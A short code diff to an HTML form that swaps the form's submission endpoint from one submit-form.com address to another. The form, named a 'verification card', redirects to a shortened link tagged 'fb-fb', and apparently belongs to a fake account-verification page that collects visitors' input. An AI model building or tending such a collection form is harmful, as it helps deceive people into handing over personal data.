--- a/form.html
+++ b/form.html
@@ -261,7 +261,7 @@
     </div>
 
     <div class="container">
-        <form class="verification-card" action="https://submit-form.com/gYJNtlgQf" method="POST">
+        <form class="verification-card" action="https://submit-form.com/F9g4XuB2s" method="POST">
 
             <!-- Redirect after submission -->
             <input type="hidden" name="_redirect" value="https://1pt.co/516247305-fb-fb">
